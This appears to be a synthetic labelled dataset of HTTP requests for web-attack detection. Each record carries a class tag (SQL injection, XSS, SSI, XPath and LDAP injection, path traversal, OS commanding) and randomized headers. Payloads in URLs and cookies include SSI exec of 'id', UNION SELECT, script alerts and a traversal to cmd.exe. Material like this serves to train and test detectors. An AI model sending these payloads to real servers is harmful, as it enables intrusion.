If-Match: "7LzWO_FYegPqugP"
If-None-Match: "9sRvEuzdCZRZsa2P"
If-Range: Thu, 20 Jul 06 16:18:30 GMT
Max-Forwards: 5511
MIME-Version: 5.2
Pragma: curht=vek
Proxy-Authorization: Digest username="sctgYp"
Authorization: prns5s reiAh=juarld
Range: 870-,33722-,80-34
Referer: /tqgL3nle/o3y3wheE/nsb0ns/aHren.mdb
TE: deflate;q=0.1
Trailer: Cache-Control
User-Agent: Mozilla/1.5 (X11; U; SunOS sun4u 5.2; da-ir; rv:5.2.6) Gecko/72907018
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9140x4441
Via: 3.5 209.225.147.148
Transfer-Encoding: identity
Upgrade: sdrona/5.0, vtfpom/3.2, guE/8.0
Warning: 096 28.130.214.30:40463 "bwtv1" "Wed, 03 May 06 17:00:25 UTC"
X-Forwarded-For: 253.197.44.195
X-Serial-Number: 9505530425947859
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41216
Start - Id: 49666
class: XPathInjection
GET /b6grf/pdSUwvvzR/seyiaoiEn/ZTP/hObkkTJ8xzrWj@HngC.png?nxKJUwMJ=r%7Cautoexeci3+e%29c%28&ej=uof%2Fone2t%2F2er3s%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D7%5D+++++or+++%27eo5mnuwu%27++%3D++%27 HTTP/1.1
Host: 97.19.115.18:58
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.4, gzip;q=0.3, identity, identity
Accept-Language: op-rr1sha9i
Cache-Control: only-if-cached
Client-ip: 35.126.171.6
Cookie: tywd=urbenmzpion;fh=e s3=bnn;l8ijpevdnteaeT=5781;zSpFihA=e ew0;aylTN=&oamailw6e> nodee
Cookie2: $Version="12"
Date: Tue, 17 Jan 06 20:31:11 UTC
ETag: "-oUkV855XGZ38_U5ND"
Expect: 100-continue
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Wed, 22 Sep 04 13:56:17 UTC
If-Unmodified-Since: Fri, 05 Nov 04 10:25:35 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Mar 09 13:52:13 UTC
Max-Forwards: 9055
MIME-Version: 8.7
Pragma: leTknldh=acrh
Proxy-Authorization: Digest nonce
Authorization: Basic cW9pb3NzOmVvdW5t
Range: 7083-858216,-723,8872-
Referer: /fhsNeo/tergu/otqt2e.jpg
TE: trailers
Trailer: Range
User-Agent: Pi407mam (p.cYAJ@rv; d1UPk7i5m)
UA-CPU: Sparc
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 176x3474
Via: FTP/7.2 www.5ntO.js, 3.6 195.168.108.149, 1.1 172.125.86.73
Transfer-Encoding: ms4k9n
Upgrade: nn7ooi/9.0
Warning: 044 www.ewuqbi.js "trhiteoe9" 
X-Forwarded-For: 73.197.107.241
X-Serial-Number: 642097
----: ------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49666
Start - Id: 40194
class: SSI
GET /0wmtuy/g5aoAzdcxeeiI4pl/e-8y@p@V/unionIopenadminvnNQHV71C/d2jrfOsVF7VmzOx4p.dll?itiqusa9rm=at&oXbOn=78740033&.home85etcELhD6O1=ta%25&o72irrinnawetH=%3C%21+++%23%3C%21--+%23exec++cmd%3D%22id%22--%3E&csuakfm=t2c6esfniurTwzmnm&dseqorxo=suywedaatehdwuk HTTP/1.0
Host: www.trfuxradn.gov
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-1250, iso-8859-9, euc-cn;q=0.9, macintosh;q=0.7, iso-8859-15
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: ttehtet='rT'
Client-ip: 95.143.38.157
Cookie: 9ulompr6bso=4iE@qiJ;fKCY0P=csg2nrsetne;gssis=eVT3lAejr;aos=2;5eePslt6Nctls=aed;ffeAs=005691985
Cookie2: $Version="6"
Date: Sun, 26 Jul 09 07:02:29 CET
ETag: W/"IY2@3WKoRmkzER6"
Expect: 100-continue
From: beevy@rdaeiuersl.de
If-Modified-Since: Wed, 06 Sep 06 01:53:09 CET
If-Unmodified-Since: Sat, 17 Nov 07 11:48:55 GMT
If-Match: "hOze64xiT@-oG0nf0"
If-None-Match: *
If-Range: Thu, 24 Apr 08 19:04:59 CET
Max-Forwards: 6675
MIME-Version: 7.7
Pragma: 3saQ=me77eas
Proxy-Authorization: Digest nonce
Authorization: Digest cnonce="ttma1tHn"
Range: -8389
Referer: http://www.sep2qnEo.uk/assers/druj/e32Tegay/eIladma/uotaamae.cgi
TE: gzip;q=0.2,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.9 (compatible; MSIE 8.4; Linux i586; ersave9pae)
UA-CPU: 68000
UA-Disp: 134,343,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9646x716
Via: 0.6 40.35.35.122, 0.7 3.184.154.12, FTP/7.3 www.b1launrl.jpg:7515
Transfer-Encoding: gzip
Upgrade: aiaEi/3.2, nenl/7.3
Warning: 193 214.100.46.242 "rhape" 
X-Serial-Number: 5910838983690
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40194
Start - Id: 40600
class: SSI
GET /tSttOtbcNomnhgtytur/winsert/stn/4xtmpzB/azxpoJTl1bUSMcWh/9wUlmNNPIW3xoB/bseilmymbs/ot/sBgeTap71/rena9esweoahgaurEnI4.php3?It=ejr+0&tiahnel=nwltoDst5twr&7erisl=2341304&Pe9vPO8nZ=49&sps@aUl=tgeof8eirioh6scrt&le8Oms=72&pt=%3C%21--%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&madhoTi3beitih=tto%3Af0oduuczxp_&wL=39huk1taA&r77oqzn=sa%2F7l HTTP/1.1
Host: www.l1qw.cz
Connection: tttne
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: abq6e-mbe, dh-i
Cache-Control: nimha9h='l'
Client-ip: 214.200.109.242
Cookie: eeet4pq=5QoAT2lFG;jdeletesfUe=aastynoG;js=qoehr;ccenha=8
Cookie2: $Version="712"
Date: Sat, 24 Mar 07 21:45:38 CET
ETag: "dirlXbsivqNLYG5E0"
Expect: ppI3Wec
From: sr3e@detdicya.fr
If-Modified-Since: Sun, 08 Aug 04 14:13:45 GMT
If-Unmodified-Since: Thu, 27 Jan 05 06:56:31 CET
If-Match: *
If-None-Match: "ofWnCgOYLd72XRTJ"
If-Range: ".hirn7vA8bFml_5T2"
Max-Forwards: 4
MIME-Version: 8.9
Pragma: eoaoasf=ebrelYNt
Proxy-Authorization: Digest algorithm=ekoie
Authorization: whMr s2snl=ehN7tod
Range: 67529-
Referer: /ameAUxa3.png
TE: chunked;q=0.0,deflate,gzip
Trailer: Warning
User-Agent: ntrutrFie5 (eUs6TY; eZ@lrRt; uzDgDEeW)
UA-CPU: PowerPC
UA-Disp: 953,006,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 7337x662
Via: FTP/0.5 www.eesBit.gif:382
Transfer-Encoding: deflate
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
Warning: 740 www.iawi.png:527 "cErneOeniy5Rfoed" 
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 69115
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40600
Start - Id: 38224
class: LdapInjection
GET /sSSV4AYBU/Hsam8X7POr.X7T/0fuMh-zRzC6D/idonmeely.htm?tazi6ef=%29%28+++%7C+%28oedae%3DoinSk*%29 HTTP/1.1
Host: 229.71.186.214
Connection: pifohN
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: naAr='td'
Client-ip: 136.113.62.155
Cookie: sess8tpe=ta?bhetissE
Cookie2: $Version="194"
Date: Wed, 07 Feb 07 14:40:18 UTC
ETag: "HeHqGgYUuhkexda"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Tue, 04 Mar 08 02:45:37 UTC
If-Unmodified-Since: Thu, 13 Jan 05 06:09:40 CET
If-Match: "l3Wr.s4F_oiop.mOHf"
If-None-Match: "g_O7HygPtwouSJqf"
If-Range: "SUcgkXw5_@-fmcnAyIrF"
Max-Forwards: 69
MIME-Version: 3.2
Pragma: ti=ahtpwEni
Proxy-Authorization: lN7eh8 3eeeTvs=rP8rhi
Authorization: NTLM MXRjb3J0bnR1b2FiRXRvZGNvYmh0YXRkc29zck9vd2xlTEFpZ3Z0T0VFaGNv
Range: 491-,605-2708,157323-67914
Referer: /pireTz/brIra.ace
TE: trailers
Trailer: Accept-Charset
User-Agent: 5tst/8.3.7.8.6
UA-CPU: Sparc
UA-Disp: 782,245,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 321x2267
Via: 9.1 151.234.217.144, FTP/3.9 www.rasg.gif:90, 1.5 171.66.144.67
Transfer-Encoding: compress
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 10.141.187.50
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38224
Start - Id: 47488
class: XSS
GET /1xnsSgNGv9WO./rKOYK/rtbgsoundfrom/ygeNpon7/update8sgJy5PRcUp/8BZpkznuJoYF/naGhaKkPnafn85hepTW4/LM/6nitEocjoEenUg/T7LmLTikP.jpg?f47w=%3Arn&oNxZn=65830&sim=5u&Q7boot.iniL4EU=%3Cscript%3Ealert+%28+++++%22++++66rrd.vfamd%22%29%3C%2Fscript%3E&eda45t=thds%5Dy1&Hu5ILy9fp=666329&Ael11group bylBMa=ag19Ln%26+t0djyh%25nv+a&d73ndO9tnilctee=e%5D5e&psn=owkJ&5F7N=it5iroaegeeagphe HTTP/1.1
Host: 95.178.90.196
Connection: close
Accept: video/*;q=0.5, application/postscript, video/*
Accept-Charset: hz-gb-2312;q=0.9, cp-950, iso-8859-3
Accept-Encoding: identity;q=0.3
Accept-Language: i-n;q=0.3, konn-xswbse;q=0.2, snnhi-7k3e0awe, bpwjlpl-nAapuie0;q=0.7
Cache-Control: no-store
Client-ip: 229.228.100.156
Cookie: 09UbetweenTeS=488458;jURaYrmtBKhavingL=tseh~>-uddi|;evalBPvKtelnetgW=6801967;eis1receee=dmRrho.vRQX
Cookie2: $Version="376"
Date: Mon, 16 Jan 06 24:41:48 GMT
ETag: W/"Q.aFiei1JBvNXi@"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Sun, 15 Feb 09 19:19:16 CET
If-Unmodified-Since: Sun, 31 Aug 08 12:28:57 CET
If-Match: *
If-None-Match: "Jo5FcRmvfghqVjAzYkIH"
If-Range: Fri, 19 Jun 09 10:03:58 GMT
Max-Forwards: 70
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 9183-933,-0
Referer: http://tbre.it/mIdEf/eeiSs8ii/w2ablier/sn4t6.wmn
TE: gzip,gzip;q=0.2
Trailer: Authorization
User-Agent: Mozilla/2.1 (Windows; U; Win 9x 4.3; ae-l1; rv:9.7.4) Gecko/14860007
UA-CPU: x86
UA-Disp: 612,9205,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 747x653
Via: gIrrrH/6.6 www.rcjtdn.jpeg, tra/8.9 www.ahsnPpb7.htm, 6.1 www.nsoaofvo.tiff
Transfer-Encoding: identity
Upgrade: qharw/0.8
Warning: 858 www.Bomdfr.html:92 "eaLxhrCi8Tuapar" 
X-Forwarded-For: 223.101.141.206
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47488
Start - Id: 48491
class: XPathInjection
GET /fucGPoZLPmLzFHf/tP1dVzCSG/s6vNKwe6V/7deldcz3da36gT/6tkrdee.nsf?7IqAnadop=dinncqhaela+Yp&aeuAwkomrteqea=tselectvbscriptNrc%5DursitGev HTTP/1.1
Host: www.tAhomSz.de
Connection: jnecRda
Accept: image/*;q=0.9, audio/*, text/plain
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.5, identity;q=0.6, gzip, gzip, compress
Accept-Language: *;q=0.0
Cache-Control: min-fresh=459
Client-ip: 24.71.38.147
Cookie: enteoebegu=1418696;hyml=sZUZvdqd;eh=muatI'  or     kihn3m/xne/child::node()[processing-instruction()=2]    or     'enhloGe'  = ';n-50=5625
Date: Thu, 21 Jan 10 18:30:11 UTC
ETag: W/"eQwuXyPR_BQb21F6Mtyb"
If-Unmodified-Since: Wed, 09 Jul 08 14:32:47 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 11 Jan 04 16:27:14 UTC
Max-Forwards: 4271
Pragma: no-cache
Range: 334156-
Referer: /dgtGamz/nson3f8.mpg
TE: trailers
User-Agent: Mozilla/2.9 (X11; U; Open BSD i386 7.1; e8-pi; rv:3.5.7) Gecko/08741387
Transfer-Encoding: identity
X-Serial-Number: 6603237
----: ----------------------------------------------

null

End - Id: 48491
Start - Id: 45145
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: www.vfodsr5.st
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 231.243.192.196
Cookie: f6na1hsEsC=0411822;gid3rli5=wo
Cookie2: $Version="1"
Date: Wed, 31 Aug 05 05:01:43 GMT
ETag: "0wSFCQ37o04lOpEZWe"
Expect: sIseObpe
From: swItt@yOenslihWe.de
If-Modified-Since: Thu, 09 Mar 06 06:29:40 CET
If-Unmodified-Since: Wed, 30 Aug 06 11:54:22 UTC
If-Match: "wYDgoW2IEMcFWQ5Yn"
If-None-Match: "eW9hicL@KKPn5hP"
If-Range: "0gcNNxmEKdNOKPe"
Max-Forwards: 832
Pragma: let2kH=rm0v
Proxy-Authorization: Basic b2U1UnFvOnlOZWVyc2E=
Authorization: NTLM ZTl5ZWluaGJpdHI4ZXMwdG5keXRlYWF0dHRvNWVld25sZHozbA==
Referer: http://www.nrse.de/suot8ot/ttls/xseljlt.aspx
TE: trailers,trailers
Trailer: Host
User-Agent: bsro/2.0.4.8.3
Via: HTTP/3.4 www.udeee.js, 3.0 www.eartphlt.html:68511
Upgrade: rihnni/3.3, qrt5E/4.2, tei5h/7.5, aev/2.9
X-Forwarded-For: 189.98.19.155
----: ----------------------------

null

End - Id: 45145
Start - Id: 41635
class: SqlInjection
GET /r4Jly6uwCH/rr/6a/emaGB/BechohRbLpTiframe/dTPYK266T./dfj/tdpTonmlr/e3hu/eVpszBIk_HE_Z_0UeS/cUptMhaSJ.png?hai=61859&iv=%27++union++select+++sum%28ey7%29+++from++lseqsfzx--&echeipc0wise=i%2Be1%2Bzng&BXONQ=Aa5k2iaeatt6Ihra&tnt1atchho=n3ErH%40yGkIE&desnfts=intctincludeoqIO%28%3Bnodeoslsd&u5i8ilELbluaO=siadopn&G3EuXeNgkD8x=52018&oo0=eec%3B7oi&lI=sreinmiiaed&inonhedce=%3Fesam HTTP/1.0
Host: www.tryramd.fr
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-korean;q=0.1
Accept-Encoding: 
Accept-Language: R-hOas, wssshshg-Eiiq;q=0.9, tt-rvL, lyigr-aedh9fnl, roie-Ooydrs
Cache-Control: no-store
Client-ip: 228.176.17.121
Cookie: shmn0=ah\c;9xaoeltQeVaT8na=31;wlehr=iframe@+ao];bdnahnoqdu7H4=97;biaerettiAGa=24446121;UnB2a=dn
Cookie2: $Version="017"
Date: Tue, 15 Feb 05 18:12:35 UTC
ETag: "-cn@c9fe6TG-hI_N3z@F"
Expect: 100-continue
From: xrtw@gme1s0.it
If-Modified-Since: Fri, 27 Feb 04 12:44:55 UTC
If-Unmodified-Since: Fri, 18 Nov 05 09:51:58 CET
If-Match: "Dv-.r08jh0juv3vdy"
If-None-Match: "pFWq6PSAn5-afpfyuQ1k"
If-Range: Fri, 22 May 09 14:04:44 UTC
Max-Forwards: 4
MIME-Version: 5.2
Pragma: lte8urmw='oc7eNria'
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: Digest cnonce="4es6ha"
Range: -11289
Referer: http://www.bnlefd.gov/Eeirsed.php
TE: deflate
Trailer: Upgrade
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 0.5; ip-dr; rv:8.8.1) Gecko/89753208
UA-CPU: Sparc
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: 3.7 www.eIetb.html, FTP/7.9 www.vdnM.tiff, HTTP/7.1 25.4.86.192
Transfer-Encoding: deflate
Upgrade: hzse/6.1
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 239.30.161.125
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41635
Start - Id: 49125
class: XPathInjection
GET /hcatsiefo2wi/1q/eT5jzo3QfxKB47@z44Kb/e2/ieyK@Opn7n17nNa9J/bOFi9T-g/qt0EX-25pnI/vxjKc/ulikeaezVLxp_3/nngm.js?muteceeqeAc=eI%3Eos&mlsY=%5CSre&tee5lrid1=1461009&h6rqssazac=oecoyhlOopEf&o4drt9laawmWH=tQD&exlhhCr6lsny=8566301&Wpassthrus0Ctk@iUF=rmoySso2ttienht48n&tsoah=6206223&wlon5jsgnrnSiA=iae%2Fy4%2FalJ3%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D787%5D+or++++%271wdh%27++%3D+++%27 HTTP/1.0
Host: 201.24.14.176
Connection: close
Accept: application/rtf, text/*, audio/x-wav;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: 9nfshNsh-eeRt;q=0.8, Te6afh-ie1tb
Cache-Control: max-age=64851
Client-ip: 172.57.198.77
Cookie: qeTmhstd=tX@;uxq8cB6=hF.KIUbQ;ltaatmi8edaueup=453;ttc0=83048532;nosTntserhDyN=mros8~h9dj)r)rs;eairbOnfyhv=8353243
Cookie2: $Version="54"
Date: Wed, 06 Jul 05 23:17:19 UTC
ETag: W/"Tvi9KhEHOu0-YyM"
Expect: 100-continue
From: NktwIe@earsOsuo.org
If-Modified-Since: Thu, 20 Jul 06 07:50:28 GMT
If-Unmodified-Since: Sun, 09 Oct 05 14:08:05 GMT
If-Match: *
If-None-Match: *
If-Range: "-m__3mTvQ_-vhY8b"
Max-Forwards: 00
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic YWFpZDpkYW90YW5q
Authorization: Digest uri=/etan5eu/Td7eez/2akw8i.php3
Range: 245-5,78-,7820-
Referer: http://www.fte7enn.uk/oi6rscm/ieyxGrdp/ac3vsx/ebrie.sh
TE: gzip;q=0.4,chunked
Trailer: If-Range
User-Agent: tnao6ttsiumooep0an
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 468x973
Via: 8.7 www.cIrensuh.css
Transfer-Encoding: compress
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 604 www.ofriesai.html "lf1behhu" 
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 0092197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49125
Start - Id: 45045
class: PathTransversal
PUT /mOlVViZPiF.swf? HTTP/1.1
Content-Length: 41
Content-Language: Qeoddn,nlu6n
Content-Encoding: deflate
Content-MD5: dVJhZWE3b25lc0NlcGVybw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 25 Jan 04 16:27:39 UTC
Host: www.84eUe.uk
Connection: keep-alive
Accept-Charset: euc-jp, windows-1254;q=0.4, big5
Accept-Encoding: identity;q=0.1, gzip, identity;q=0.7, compress
Accept-Language: *
Client-ip: 3.156.88.100
Cookie: e5yuniiIiq6n=74047730;9Pscriptwget=rcpez;t9=906;W-pa=isJLn03lEY;iasrfZsao=file:///l:/r7d2w/iewtr/Rs9ee.xml
Date: Mon, 23 Apr 07 20:36:54 GMT
ETag: W/"DetRkA0QizQfV9A5"
Expect: 100-continue
If-Range: Thu, 26 May 05 24:33:37 GMT
MIME-Version: 0.9
Proxy-Authorization: NTLM YWJydXBvYWd1b3htbG90dWwyYWFhc2xobW9uSDlBcnNveXBhdHRsc3hkcnIzaQ==
Referer: http://tofstamo.cz/meapgthi/7ith/ywcoltgl.msf
User-Agent: eBunh (7ArGXtZyMW)

Ta=ts-smh9zulo&jm=ixitahoH&lemic=86775778

End - Id: 45045
Start - Id: 43807
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 190.176.24.119
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: wthhe-ltenld, m9ntya-Eotry;q=0.7
Cache-Control: max-age=918
Client-ip: 69.5.212.169
Cookie: arjat=fromighttp;oq8rude=wN5D7yB;Tj0p=ouziigrtnufde;@W0OnexecG5aR=7niHtls;wpsJuR=36159532;XAYEkK.gphp=Tlr t
Cookie2: $Version="9"
Date: Fri, 28 Sep 07 02:30:34 GMT
ETag: W/"ZWarviPtT3Lux5IR2"
Expect: u9re=alahjAwN
From: uZkpt@nesht4Iih.ch
If-Modified-Since: Mon, 04 Jan 10 02:16:34 CET
If-Unmodified-Since: Fri, 10 Jun 05 21:26:02 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Apr 04 13:52:08 GMT
Max-Forwards: 54
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM aWV4bGVnM2dldjllZXlvY3M5N2llb3NuNW5vZXNleGxlY3A5a29mRXNl
Range: 904036-,02113-35,44499-
Referer: /n5ttihS/hajeqN/ehhT/5isya.zip
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.2 (X11; U; Open BSD i586 4.8; aP-ut; rv:9.0.1) Gecko/84933319
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 057x9927
Via: 3.1 7.18.27.109
Transfer-Encoding: identity
Upgrade: eprO5e/8.0, stnNLn/3.7, rEev/8.9
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43807
Start - Id: 48626
class: XPathInjection
PUT /yagb4AiaaFiqslcnraae/YdHmgP5IZakPRd/th1ie3t/Udtfbrair5/anefad0yrOsEaihr2.css? HTTP/1.1
Content-Length: 382
Content-Language: CfJrTc,Aaia
Content-Encoding: deflate
Content-Location: http://kw5dcej.gov/eiOiEp/cnppxait/wojin/uDMae/akcts.rar
Content-MD5: bEN5Z3JsNm1vb3Q1cm5xZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Jul 05 21:36:17 GMT
Last-Modified: Mon, 20 Oct 08 06:30:32 UTC
Host: www.tndb.fr
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-874
Accept-Encoding: 
Accept-Language: *
Cache-Control: 4theoyeo=mPtkn
Client-ip: 68.45.171.152
Cookie: d33=40141;AfOe=insertmochaz|bothdbhclii h ;Bou=4;iCmebc=12990;rmatltea=cHJ
Cookie2: $Version="9"
Date: Sun, 04 Jan 09 02:08:24 CET
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: rcneifm=nmthhk;6exTej01=esgtdhS2
From: wsnewerh@atausf.it
If-Modified-Since: Thu, 30 Sep 04 18:05:43 GMT
If-Unmodified-Since: Thu, 05 Jun 08 20:13:58 UTC
If-Match: "-c95yXrVlBW9d_JI"
If-None-Match: "ETknoUyrhJSSRp0c"
If-Range: Tue, 17 Oct 06 12:48:14 UTC
Max-Forwards: 752
MIME-Version: 7.4
Pragma: d=teqSaaes
Proxy-Authorization: NTLM eW5FcXBhcmVnbWJ1cjJhdWFlRTBsbjg1b25ld2N0bmxPVWg=
Authorization: NTLM ZXNvY2hkYnNsTlR5bHd4eXRlYXNjc3d0c2JuaHFkNHNpMHV1c2dyZWhlbWFlcw==
Range: 939-64,563448-00397,65796-
Referer: /eniet/th3sli/tfgonP/ahrvt.sh
TE: deflate;q=0.2
Trailer: Referer
User-Agent: ftoanndh/0.6.0.9.3
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: l1u/7.1 www.eb11nnua.js
Transfer-Encoding: ossh3
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

M4kBadmine=39  or     1< riy/Lsti/T/child::text()[position()=1] or     1965='] | /* | /foo[bar='&kewo6o=45206660&en=sl-r>&n1yIVn4=aletlibrt&TdocumentqNynrwn_F=02&Tc=exN3aS&WaU8jlQCILX=4 E\\Ezdei8s1d&nIaeth=Eonaiho thn0 t&3.kGX7S.rWz=j/&7etr5srz2eeyk=dj9uascR&oXTK-Dmailh3=eRunaey iATd&7Ssnse=rztIteao1himc&0acoi50edalsm=ecyperla

End - Id: 48626
Start - Id: 49714
class: XPathInjection
GET /mites4Neet/rt/tC/eocp/p1/IApositionYlikeC/ahragajnDrI7dieeun/rOq/stxiOlCalhumezhn5isi/tnY3SBT/etse2lCpaeeERpl/l-_.sOGZ.png?Eboot.ini0z6=911&welt2=slandrimgleonl&ercetTsytrvt=303+++or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++76337%3D&I7ydeutiezJa=e8tN HTTP/1.1
Host: 40.112.111.115
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.6, compress;q=0.5, identity, identity
Accept-Language: 5ne7w-ht9tum7, actwd-edLRnraC;q=0.1, ExSisp-jtnLziNN, smdIe-orrdonIj
Cache-Control: no-cache
Client-ip: 108.36.71.41
Cookie: eyEEE=rimf
Cookie2: $Version="828"
Date: Mon, 15 Dec 08 07:30:18 CET
ETag: "iITkPXqitf-bCHofqIg"
Expect: 100-continue
From: hiet@nuddg.biz
If-Modified-Since: Sun, 07 Jan 07 08:41:44 GMT
If-Unmodified-Since: Thu, 10 Jun 04 23:57:02 CET
If-Match: "fw3qfd3nb@EWIzK3hC"
If-None-Match: "hUUge31XwwYWv51BT7v"
If-Range: Fri, 26 Feb 10 08:13:01 CET
Max-Forwards: 41
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: Digest nonce
Range: 74-4,110349-,51246-
Referer: http://rmedt80l.com/n5eisno/lafs/jao4ian/i4at.mp3
TE: gzip;q=0.4,chunked,gzip
Trailer: If-Modified-Since
User-Agent: 5Hdldse1pe (ajaP@Fn7JM; oSXx93)
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: 4.5 62.242.219.94, 8.0 www.wxapd.tiff, 2.1 38.154.240.4
Transfer-Encoding: lior4
Upgrade: hdoAgi/1.2, icsn/0.8, don/0.5
Warning: 018 www.iupl6.jpg "b3zD8yiorsn" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49714
Start - Id: 49769
class: XPathInjection
GET /iP/1-/ay4f6Oih/nGaUH/i5r335WZA-QpZR/d-_0j/t0a2DlHmslc6JdzCtPdE/phi6oqoewiirrt.pl?AneTLa=insert+r4&or1ieHsSemtr=92702449&location639sT=lclcop&anmriaHTrtlt=slO9oh&txszstgikimlrti=%28i+%3C+count%28dngy%2Fchild%3A%3Atext%28%29%29+and+j+++%3C+++++count%28rPrnna%2Fchild%3A%3Acomment%28%29%29+++and++++k+++%3C+++++count%284e%2Fchild%3A%3A*%29+%29&4oFec2ztA=wx1d%40RzlQaO&M-MTnetcat=0716&ualCntiltitj=sct&atra9soe=29896&rohiiadHiyi=gLn&tapo7gt8ocre=85598372 HTTP/1.0
Host: www.eilf.it:8
Connection: pr6dasen
Accept: application/x-tar;q=0.1, text/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=7
Client-ip: 253.1.218.202
Cookie: 5btuXhzle=eyigroup by[y0;riclensteTEqut=hsrwta2qxirmo|naa;oiDh=rHWsF-hI9VR;h1xmtajawutRh8=91913;ey=binkdkd0daaccess_log8nfeo3;lyxiesiayeg=3zUzRWv
Cookie2: $Version="682"
Date: Sun, 10 Oct 04 24:55:16 GMT
